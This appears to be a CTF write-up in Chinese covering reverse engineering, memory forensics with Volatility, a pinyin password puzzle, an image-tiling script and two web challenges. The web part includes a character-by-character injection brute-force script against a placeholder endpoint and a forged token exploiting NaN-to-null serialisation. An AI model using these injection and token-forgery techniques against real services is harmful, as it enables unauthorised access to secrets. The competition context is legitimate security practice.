原本都打算放弃第一场分站赛,第一天就出了三个解,再加上上海赛,人力精力严重不够 最后9小时密码上大分,硬是进了前二十,师傅们辛苦 累,hvv + rctf + 上海 + sb ppt大赛答辩,天天通宵,快死了
# Banner shown by the script: twenty-two lines that each hold a single "#"
# in this copy (the original ASCII art appears to have been flattened during
# extraction). Built without surrounding blank lines, so no strip() is needed.
logo = "\n".join(["#"] * 22)
企图挖出一个新的CVE,尝试过压缩算法,但是不了了之(评价为逃逸做多了,脑子不正常了
// Decompiled fragment; the enclosing method and the fields this.j and this.d lie outside this excerpt.
if (this .j > 3000 ) {
    // Two parallel 17-entry tables. Several entries are written as keycode constants
    // (VK_F16, KEY_NUMPADEQUALS) instead of numeric literals, so the plain values are
    // not visible in the listing.
    int [] iArr = {164 , 158 , 95 , 107 , 4 , 215 , 108 , 115 , 5 , 8 , 25 , 57 , 41 , 236 , 231 , 17 , 85 };
    int [] iArr2 = {246 , 221 , 11 , 45 , WindowsKeycodes.VK_F16, 148 , 45 , 36 , 70 , 73 , 78 , 8 , 98 , Keyboard.KEY_NUMPADEQUALS, 140 , 112 , 40 };
    String str = "" ;
    // str is rebuilt at run time as the pairwise XOR of the two tables, one char per index.
    for (int i = 0 ; i < iArr.length; i++) {
        str = str + String.valueOf((char ) (iArr[i] ^ iArr2[i]));
    }
    // Same scheme for a second, 4-entry pair (XK_Acircumflex stands in for one value).
    int [] iArr3 = {100 , 174 , 197 , 56 };
    int [] iArr4 = {2 , LinuxKeycodes.XK_Acircumflex, 164 , 95 };
    String str2 = "" ;
    for (int i2 = 0 ; i2 < iArr3.length; i2++) {
        str2 = str2 + String.valueOf((char ) (iArr3[i2] ^ iArr4[i2]));
    }
    // Both decoded strings are handed to a GameOverStat; its definition is not on this page.
    this .d.add (new GameOverStat(str2, null , str));
}
from pwn import xor
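# First operand: the iArr table from the decompiled check above.
a = [164, 158, 95, 107, 4, 215, 108, 115, 5, 8, 25, 57, 41, 236, 231, 17, 85]
# Second operand: iArr2 with the keycode constants already resolved to the
# values used here (VK_F16 -> 127, KEY_NUMPADEQUALS -> 141).
b = [246, 221, 11, 45, 127, 148, 45, 36, 70, 73, 78, 8, 98, 141, 140, 112, 40]
# Pairwise XOR using only the standard library instead of pwntools' xor();
# zip() stops at the shorter list, which is harmless here because both
# tables have 17 entries.
decoded = bytes(x ^ y for x, y in zip(a, b))
print(decoded)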
Offset (V ) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa8018d94840 System 4 0 70 356 ------ 0 2024-05-19 06:58 :31 UTC +0000
0xfffffa8019355950 smss .exe 200 4 2 30 ------ 0 2024-05-19 06:58 :31 UTC +0000
0xfffffa8019de0b30 csrss .exe 288 280 9 425 0 0 2024-05-19 06:58 :32 UTC +0000
0xfffffa801a00d060 csrss .exe 380 372 10 185 1 0 2024-05-19 06:58 :33 UTC +0000
0xfffffa801a00a420 wininit .exe 388 280 4 80 0 0 2024-05-19 06:58 :33 UTC +0000
0xfffffa801a082750 services .exe 440 388 12 209 0 0 2024-05-19 06:58 :33 UTC +0000
0xfffffa801a0bc4d0 winlogon .exe 464 372 4 111 1 0 2024-05-19 06:58 :34 UTC +0000
0xfffffa801a0c6400 lsass .exe 492 388 10 560 0 0 2024-05-19 06:58 :34 UTC +0000
0xfffffa801a0c8060 lsm .exe 500 388 11 143 0 0 2024-05-19 06:58 :34 UTC +0000
0xfffffa801a1535f0 svchost .exe 620 440 15 367 0 0 2024-05-19 06:58 :35 UTC +0000
0xfffffa801a16db30 vmacthlp .exe 684 440 4 56 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a17e060 svchost .exe 728 440 9 248 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a1a25e0 svchost .exe 792 440 17 309 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa8018e60250 svchost .exe 864 440 31 650 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a1ecb30 svchost .exe 916 440 14 485 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a207450 svchost .exe 964 440 12 216 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a217b30 svchost .exe 1004 440 19 340 0 0 2024-05-19 06:58 :36 UTC +0000
0xfffffa801a25d4a0 svchost .exe 328 440 6 104 0 0 2024-05-19 06:58 :37 UTC +0000
0xfffffa801a2d8060 VGAuthService . 240 440 3 91 0 0 2024-05-19 06:58 :38 UTC +0000
0xfffffa801a2f8600 vmtoolsd .exe 276 440 9 272 0 0 2024-05-19 06:58 :39 UTC +0000
0xfffffa801a302b30 ManagementAgen 1048 440 11 91 0 0 2024-05-19 06:58 :39 UTC +0000
0xfffffa801a3b3870 svchost .exe 1228 440 7 100 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a3d25f0 dllhost .exe 1332 440 21 210 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a3ee060 WmiPrvSE .exe 1428 620 11 188 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a400b30 dllhost .exe 1492 440 17 210 0 0 2024-05-19 06:58 :40 UTC +0000
0xfffffa801a41bb30 taskhost .exe 1576 440 10 175 1 0 2024-05-19 06:58 :41 UTC +0000
0xfffffa801a47e4f0 sppsvc .exe 1788 440 5 152 0 0 2024-05-19 06:58 :43 UTC +0000
0xfffffa801a4ae390 msdtc .exe 1848 440 16 156 0 0 2024-05-19 06:58 :44 UTC +0000
0xfffffa801a4e3060 dwm .exe 1400 964 7 118 1 0 2024-05-19 06:58 :51 UTC +0000
0xfffffa801a4e0060 explorer .exe 1480 1292 28 601 1 0 2024-05-19 06:58 :51 UTC +0000
0xfffffa801a53fb30 vmtoolsd .exe 1468 1480 7 191 1 0 2024-05-19 06:58 :56 UTC +0000
0xfffffa801a544060 Poner .exe 1420 1480 9 214 1 1 2024-05-19 06:58 :56 UTC +0000
0xfffffa801a5d09e0 WmiPrvSE .exe 1756 620 12 255 0 0 2024-05-19 06:59 :00 UTC +0000
0xfffffa801a604b30 WmiApSrv .exe 1932 440 7 112 0 0 2024-05-19 06:59 :01 UTC +0000
0xfffffa801a6eeb30 idaq64 .exe 2172 2156 7 275 1 1 2024-05-19 06:59 :21 UTC +0000
$ volatility -f Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile=Win7SP1x64 memdump -p 2172 -D ./
Volatility Foundation Volatility Framework 2.6
**** **** **** **** **** **** **** **** **** **** **** **** **** **** **** **** **** ****
Writing idaq64.exe [ 2172] to 2172.dmp
353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766
0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100
Python 3.10 .10 (tags/v3.10 .10 :aad5f6a, Feb 7 2023 , 17 :20 :36 ) [MSC v.1929 64 bit (AMD64)] on win32
Type "help" , "copyright" , "credits" or "license" for more information.
>>> a = "353f4e2b566b746a5d6d6f736c773868596e20213c714f09367d557251322766"
>>> b = "0c0f2b486f5d46536459594b5f475b5b6b5f15165d12766b071b334a67071100"
>>> from pwn import xor
>>> xor(bytes.fromhex(a), bytes.fromhex(b))
b'90ec9629946830c32157ac9b1ff8656f'
filescan后发现有个enc.i64,使用volatility3导出
$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem filescan.FileScan | grep i64
0x7e578330 100.0 \Users\Administrator\Desktop\enc.i64 216
$ python3 vol.py -f ../Windows_7_x64_52Pojie_2-Snapshot2.vmem dumpfiles.DumpFiles --physaddr 0x7e578330
Volatility 3 Framework 2.5 .0
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0x7e578330 enc.i64 file.0x7e578330 .0xfa801a460940 .DataSectionObject.enc.i64 .dat
很明显与火狐相关,导出所有.sqlite文件,在places.sqlite中看到个百度网盘
$ vol.py -f gogogo.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000007f634f80 -D ./
Volatility Foundation Volatility Framework 2.6 .1
DataSectionObject 0x7f634f80 None \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.de
SharedCacheMap 0x7f634f80 None \Device\HarddiskVolume1\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s1qv2uam.def au
https://pan.baidu.com/share/init?surl=ZllFd8IK-oHvTCYl61_7Kw
$ vol.py -f gogogo.raw
Volatility Foundation Volatility Framework 2.6 .1
Session WindowStation Format Handle Object Data
1 WinSta0 CF_UNICODETEXT 0x2c01b1 0xfcf3c570 cwqs
1 WinSta0 0x0 L 0x10
1 WinSta0 0x0 L 0x0
1 WinSta0 0x0 L 0x0
1
niuo ybufmefhui kjqillxdjwmi uizebuuidvooudpn uibuui jqybdm vegeyisivemeuoll jxysgowodmnkderf dbmzfa hkhkdazizvjnybufme hkwjdeggmana mimajqueviigkyllda doqisl bapnynqrpnqrxcxxzimu
strings后发现b站用户(我什么时候才能学会strings大法
你说 有什么方式 看起来像加密
是这不是 对哦
双拼 是不是 就有点 这个意思
这么说来 借用过我电脑的人 都没法 好好打字
最近有什么 好玩的跟妈 那 密码就设置成
快来打 夺旗赛 吧
拼音全拼 全小写字母
from PIL import Image
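# Each flagN.png is cut into a GRID x GRID grid of tiles, and every tile's pixels
# are de-interleaved by their offset inside a 2x2 block into four separate
# OUT_SIDE x OUT_SIDE images, written as 4N.png .. 4N+3.png. The inner indexing
# reads tile pixels at (0..19, 0..19), i.e. it assumes every tile is 20x20
# (an 800x800 source image) — TODO confirm against the actual inputs.
GRID = 40          # tiles per side in the source image
OUT_SIDE = 400     # side length of each output image
SUBIMAGES = 4      # one output per (ii, jj) offset within a 2x2 pixel block


def _scatter_tile(region, outputs, col, row):
    """Copy one tile into the four outputs, 10x10 pixels each.

    Pixel (2*x + ii, 2*y + jj) of ``region`` is written to pixel
    (10*col + x, 10*row + y) of ``outputs[jj*2 + ii]`` for x, y in 0..9.
    """
    for n in range(SUBIMAGES * 100):
        pos, sub = divmod(n, SUBIMAGES)   # pos: 0..99 cell index, sub: 0..3 block offset
        y, x = divmod(pos, 10)
        jj, ii = divmod(sub, 2)
        pixel = region.getpixel((x * 2 + ii, y * 2 + jj))
        outputs[sub].putpixel((col * 10 + x, row * 10 + y), pixel)


for flag in range(10):
    img = Image.open('flag{}.png'.format(flag))
    # Tile size is derived from the source image, so it must be a multiple of GRID.
    tile_w = img.size[0] // GRID
    tile_h = img.size[1] // GRID
    outputs = [Image.new('RGB', (OUT_SIDE, OUT_SIDE)) for _ in range(SUBIMAGES)]
    for row in range(GRID):
        for col in range(GRID):
            box = (tile_w * col, tile_h * row, tile_w * (col + 1), tile_h * (row + 1))
            _scatter_tile(img.crop(box), outputs, col, row)
    for idx, out in enumerate(outputs):
        out.save('./{}.png'.format(flag * SUBIMAGES + idx))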
from requests import post
from string import printable
# Target of the first stage; host and port are placeholders in the write-up.
url = "http://ip:port/key1"
# Sorted ASCII printable characters with "(" and ")" removed. Note that this
# rebinds the name imported from string above.
printable = bytes (sorted (list (printable.encode()))).decode().replace(")" , "" ).replace("(" , "" )
# Known prefix of the value being recovered; the input appears to be placed
# unparameterised into a comparison server-side (the ">=" in the payload).
# Defensive note: a parameterised, equality-only lookup exposes no ordering
# signal and removes this kind of character-by-character leakage.
payload = "'||love_key>='RCTF{"
while True :
    for i in range (len (printable)):
        test = payload + printable[i]
        data = {"key1" : test}
        resp = post(url, data=data)
        # The response body is the only signal used: the first candidate the
        # server answers "wrong" to ends the scan, and the preceding character
        # is appended to the prefix.
        if resp.text == "wrong" :
            payload += printable[i - 1 ]
            break
    print(payload)
key2用NaN + Number改userinfo
// The token submitted below decodes to {"username":"","love_time":null,"have_lovers":true},
// consistent with JSON serialisation mapping NaN to null. A check performed on the
// in-memory object (where love_time is NaN) and a check performed on the serialised
// token (where it is null) can therefore disagree; servers should validate the value
// they actually serialise and sign, not the one they were handed.
createToken ({username : "" ,love_time : NaN,have_lovers : true,})
from requests import post
# Second stage: submit the prepared token and print whatever the service answers.
url = "http://ip:port/check"
love_token = (
    "eyJ1c2VybmFtZSI6IiIsImxvdmVfdGltZSI6bnVsbCwiaGF2ZV9sb3ZlcnMiOnRydWV9"
    ".6711263ca1c25b2bcc973a4d2c989adfacab694ef5406650c1cf58a178b42fbe"
)
form = {"love_token": love_token}
response = post(url, data=form)
print(response.text)